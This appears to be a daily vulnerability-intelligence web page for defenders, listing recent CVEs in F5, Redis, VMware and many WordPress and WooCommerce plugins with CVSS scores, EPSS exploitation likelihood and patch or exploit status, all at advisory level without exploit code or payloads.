THREAT ALERT

EMERGENCY CVE-2025-53521 9.3 F5 BIG-IP APM (Access Policy Manager) contains a remote code execution vulnerability triggered by specific malicious traffic when an access policy is configured on a virtual server. | ACT NOW CVE-2025-49844 9.9 UAF in Redis 8.2.1 via crafted Lua scripts by authenticated users. EPSS 12.4%. Patch available. | ACT NOW CVE-2025-60787 7.2 MotionEye video surveillance software version 0.43.1b4 and earlier contains an authenticated OS command injection via configuration parameters such as image_file_name. Admin users can inject commands that execute when the Motion daemon restarts, achieving code execution on the surveillance server. | ACT NOW CVE-2025-41244 7.8 VMware Aria Operations and VMware Tools contain a local privilege escalation vulnerability. Rated high severity (CVSS 7.8), this vulnerability is low attack complexity. Actively exploited in the wild (cisa kev) and public exploit code available. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Get CVEs that hit your stack — not 200/day

Pick your technologies, get a weekly digest by email. Free, no spam.

React Python Postgres +200 more

React Next.js Python Postgres AWS +200 more

Trending Now See all

Critical Watch See all

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Incoming 20

Pre-NVD – not yet scored

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — October 29, 2025

18 CVEs tracked today. 0 Critical, 1 High, 17 Medium, 0 Low.

CVE-2025-64284 HIGH CVSS 7.5
Local file inclusion in Majestic Support WordPress plugin versions ≤1.0.7 allows authenticated attackers with low-level privileges to include arbitrary PHP files from the server filesystem via improper filename control in include/require statements. With CVSS 7.5 (High), the vulnerability requires high attack complexity but can lead to complete confidentiality, integrity, and availability compromise. EPSS score of 0.10% (28th percentile) suggests low probability of mass exploitation. No public exploit code identified and not present in CISA KEV at time of analysis, though Patchstack tracking indicates vendor awareness.

PHP LFI File Upload
CVE-2025-64296 MEDIUM CVSS 5.3
Missing authorization in Facebook for WooCommerce plugin versions up to 3.5.7 allows authenticated attackers to bypass access controls and dismiss administrative notices through incorrectly configured security levels. The vulnerability enables privilege escalation or information disclosure via improper access control enforcement, though the low EPSS score (0.03%, 9th percentile) suggests limited real-world exploitation likelihood despite the broken access control flaw.

WordPress Authentication Bypass
CVE-2025-64290 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce Product Search for WooCommerce premmerce-search allows Cross Site Request Forgery.This issue affects Premmerce Product Search for WooCommerce: from n/a through <= 2.2.4.

WordPress CSRF
CVE-2025-64289 MEDIUM CVSS 5.9
Stored XSS in Premmerce Product Search for WooCommerce through version 2.2.5 allows high-privilege authenticated users to inject malicious scripts that execute in the context of other users' browsers, affecting website visitors and administrators. The vulnerability requires user interaction (page view) to trigger payload execution and has low EPSS exploitation probability (0.02%), indicating minimal real-world risk despite the network-accessible attack vector. No public exploit code or active exploitation has been confirmed.

PHP WordPress XSS Woocommerce
CVE-2025-64288 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in Premmerce Premmerce premmerce allows Cross Site Request Forgery.This issue affects Premmerce: from n/a through <= 1.3.19.

CSRF
CVE-2025-64286 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in WpEstate WP Rentals wprentals allows Cross Site Request Forgery.This issue affects WP Rentals: from n/a through <= 3.13.1.

CSRF
CVE-2025-64285 MEDIUM CVSS 5.4
Missing Authorization vulnerability in Premmerce Premmerce Wholesale Pricing for WooCommerce premmerce-woocommerce-wholesale-pricing allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Premmerce Wholesale Pricing for WooCommerce: from n/a through <= 1.1.10.

WordPress Authentication Bypass
CVE-2025-64234 MEDIUM CVSS 4.3
Missing Authorization vulnerability in Evergreen Content Poster Evergreen Content Poster evergreen-content-poster allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Evergreen Content Poster: from n/a through <= 1.4.5.

Authentication Bypass
CVE-2025-64226 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in colabrio Stockie Extra stockie-extra allows Cross Site Request Forgery.This issue affects Stockie Extra: from n/a through <= 1.2.11.

CSRF
CVE-2025-64212 MEDIUM CVSS 5.4
Missing Authorization vulnerability in StylemixThemes MasterStudy LMS Pro masterstudy-lms-learning-management-system-pro allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MasterStudy LMS Pro: from n/a through < 4.7.16.

Authentication Bypass
CVE-2025-64211 MEDIUM CVSS 5.3
Missing Authorization vulnerability in StylemixThemes Masterstudy Elementor Widgets masterstudy-elementor-widgets allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Masterstudy Elementor Widgets: from n/a through <= 1.2.4.

Authentication Bypass
CVE-2025-64201 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in blubrry PowerPress Podcasting powerpress allows Cross Site Request Forgery.This issue affects PowerPress Podcasting: from n/a through <= 11.13.12.

CSRF
CVE-2025-64199 MEDIUM CVSS 5.3
Missing Authorization vulnerability in WpEstate wpresidence wpresidence allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects wpresidence: from n/a through <= 5.3.2.

Authentication Bypass
CVE-2025-58939 MEDIUM CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in highwarden Super Store Finder superstorefinder-wp allows Cross Site Request Forgery.This issue affects Super Store Finder: from n/a through <= 7.5.

CSRF
CVE-2025-58711 MEDIUM CVSS 5.3
Missing Authorization vulnerability in solwin Blog Designer PRO blog-designer-pro allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Blog Designer PRO: from n/a through <= 3.4.8.

Authentication Bypass
CVE-2025-57931 MEDIUM CVSS 5.3
Cross-site request forgery in Ays Pro Popup box WordPress plugin versions up to 5.5.4 allows attackers to perform unauthorized actions (such as modifying plugin settings or creating popups) on behalf of authenticated administrators without their knowledge or consent. The vulnerability requires victim interaction (clicking a malicious link while logged in) but carries low exploitation probability (EPSS 0.02%, percentile 4%), suggesting limited real-world attack pressure despite the theoretical risk.

CSRF
CVE-2025-49042 MEDIUM CVSS 5.9
Stored cross-site scripting (XSS) vulnerability in Automattic WooCommerce through version 10.0.2 allows attackers to inject malicious scripts that persist in the application and execute in the browsers of other users. The vulnerability stems from improper input neutralization during web page generation, enabling authenticated or lower-privileged users to compromise the integrity of the WooCommerce storefront and potentially steal customer data or perform actions on behalf of administrators.

WordPress XSS
CVE-2025-11705 MEDIUM CVSS 6.5
Arbitrary file read vulnerability in Anti-Malware Security and Brute-Force Firewall WordPress plugin (versions up to 4.23.81) allows authenticated Subscriber-level users to read sensitive files from the server via unprotected AJAX endpoints. The vulnerability combines missing capability checks with information exposure in multiple GOTMLS_* AJAX actions, enabling attackers with minimal WordPress privileges to access arbitrary file contents including configuration files and credentials. No public exploit code has been confirmed at this time, though the vulnerability is trivial to exploit given the low authentication barrier.

WordPress Authentication Bypass Information Disclosure

Track CVEs for your stack Sign up free →

Today's Vulnerabilities Vulnerabilities